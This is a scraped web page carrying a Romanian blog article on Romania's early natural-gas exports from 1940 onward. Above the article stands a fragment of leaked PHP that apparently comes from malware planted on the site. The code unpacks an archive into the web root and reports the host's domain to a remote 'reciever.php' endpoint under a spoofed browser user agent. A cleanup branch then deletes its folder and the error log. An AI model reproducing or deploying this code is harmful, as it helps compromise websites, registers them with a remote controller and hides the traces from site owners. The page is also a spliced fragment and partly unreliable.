'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> România prima țară exportatoare de gaze naturale din Europa | Dumitru Chisalita

Rss

România prima țară exportatoare de gaze naturale din Europa

România poate fi considerată una din primele 3 țări din lume sub aspectul pionieratului în industria de gaze naturale, deținând numeroase premiere europene în privința unor activități specifice acestui sector. România deține premiera primului export de gaze naturale din Europa care a demarat în 30 august 1940.

Primul export de gaze naturale din lume începe în anul 1891 odată cu pozarea unei conducte din Bartie, Ontario – Canada și Buffalo, New York-SUA. Al doilea export de gaze din lume și primul din Europa se deruleaza începând cu 30 august 1940, odată cu intrarea în vigoare a Dictatului de la Viena, respectiv anexarea Transilvaniei de Nord Ungariei.

Urmare a înţelegerilor dintre Ribbentrop şi G. Ciano, miniştrii de externe ai Germaniei şi respectiv ai Italiei desfăşurată la Viena în 26 augist 1940 se hotăreşte soarta României: „fie se încheie un arbitraj privind Transilvania, fie va fi sfârşitul României”, după cum declara ministrul de externe al României M. Manoilescu. Astfel, în data de 30 august 1940 se semna „Dictatul de la Viena” acela care avea repercursiuni teritoriale semnificative asupra Transilvaniei. În urma acestor consecinţe oraşul Tg, Mureş, în care Societatea de Gaze SONAMETAN avea o distribuţie de gaze naturale este preluat de statul ungar. Secţia de Distribuţie Gaze Tg. Mureş cu întreg inventarul ei şi conducta de transport Seuca Tg. Mureş pe o porţiune de 9 km, urma să funcţioneze pe teritoriul Ungariei. Secţia de distribuţie şi conducta de transport au fost operate în continuare tot de catre SONAMETAN, aceasta exportând gaze din România (de pe teritoriul rămas României) din câmpul Şaroş. Acest export a continuat până în  anul 1944 când Transilvania revine României.

Statisticile internaționale nu iau în considerare acest moment istoric și stabilesc că al doile export de gaze naturale din lume și primul din Europa este exportul realizat în anul 1946 din URSS spre Varşovia din zăcământul de gaze de la Stryji în vestul Belarusiei. Deşi acest moment este consemnat în lucrările de specialitate ca fiind primul export al gazelor naturale considerăm că situaţia trebuie analizată sub aspectul istoricului său. Astfel zona Stryji, din care se exportau aceste gaze și teritoriul pe care s-a pozat conducta au aparţinut Poloniei, acestea fiind ulterior anului 1945 cedate URSS, urmare a unor Conventii internaționale. Punerea în valoare a zăcământului de la Stryji, respectiv construirea conductelor de transport a gazelor fiind realizate de asemene de polonezi. Cele expuse anterior ne permit să apreciem că URSS a “primit” un zăcământ de gaze şi sistemul de conducte pentru transportul gazelor din acest zăcământ către o direcţie de livrare – Varşovia – stabilită înaintea preluării teritoriului de către URSS. În concluzie această primă livrare a gazelor naturale poate fi apreciată ca fiind un export tehnic impus şi mai puţin stabilit de comun acord în baza unor negocieri. Dar, o situație similară, s-a realizat cu 6 ani mai devreme în România, unde tot printr-o conjuctură convențională, de aceea consider că primul export de gaze naturale din Europa a fost cel realizat din România către Ungaria în anul 1940.

Catalogand cele două situații amintite anterior conjuncturale, primul export de gaze din Europa stabilit prin negocierea interpretării se realizează în anul 1958 între România și Ungaria, în baza Convenţiei între Guvernul României şi cel al Ungariei semnată în anul 1952 prin care se convenea livrarea gazelor naturale în Ungaria (momnent istoric de asemena neconsemnat în nici o statistică internațională).

La 12 iunie 1952 se semnează o convenţie între Guvernul României şi cel al Ungariei prin care se convenea livrarea gazelor naturale în Ungaria printr-o conductă de 10“ construită la vest de Satu Mare. Acest act venea la 61 de ani de la primul export de gaze naturale din lume cel între Canada şi SUA.

La 6 martie 1956, printr-o HCM, se modifică prevederile convenţiei, punerea în exploatarea a acestei conducte urmând a se realiza 1 octombrie 1958 urmând a livra o cantitatea anuală de 200 mil mc timp de 25 de ani.

Acest export s-a realizat cu 7 ani înaintea exportului comerciale al gazelor din Olanda către Germania şi cu 9 ani înaintea exportului comercial de gaze din Rusia (cel mai mare exportator de gaze din lume începând cu anii ’80 până în prezent) către Cehoslovacia. Exporturile României au variat între 3,3% din cantitatea de gaze produsă în anul 1949 şi 0,8% în anul 1973.

Deşi Convenţia semnată între Guvernele Ungariei şi României prevedea să se exporte gaze, în Ungaria, pe o perioadă de 25 ani (până în anul 1983), prevederile acesteia nu au putut fi respectate datorită creşterii consumului intern de gaz, depletării zăcămintelor şi clauzelor contractului de import al gazelor din Federaţia Rusă (interzicerea exportului gazelor ruseşti). Anul 1981 a fost ultimul an în care România s-a mai numărat între ţările exportatoare de gaze naturale.